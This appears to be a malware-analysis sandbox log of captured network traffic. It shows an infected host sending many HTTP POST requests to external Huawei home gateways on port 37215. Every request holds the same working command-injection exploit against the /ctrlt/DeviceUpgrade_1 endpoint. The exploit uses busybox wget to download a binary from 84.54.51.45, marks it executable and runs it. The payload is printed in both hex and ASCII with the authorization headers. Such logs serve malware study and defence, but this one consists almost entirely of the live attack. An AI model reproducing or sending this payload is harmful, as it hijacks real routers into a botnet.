                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            677192.168.2.153727241.143.74.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161047935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            678192.168.2.155889841.122.164.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161072969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            679192.168.2.155706641.52.188.2937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161077976 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            680192.168.2.155608841.114.247.11237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161137104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            681192.168.2.154432641.94.197.8837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161142111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            682192.168.2.153946841.193.106.16537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161143064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            683192.168.2.154751441.8.23.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161165953 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            684192.168.2.155208441.82.241.5937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161169052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            685192.168.2.154833241.188.83.18837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161175013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            686192.168.2.153628041.133.26.10937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161179066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
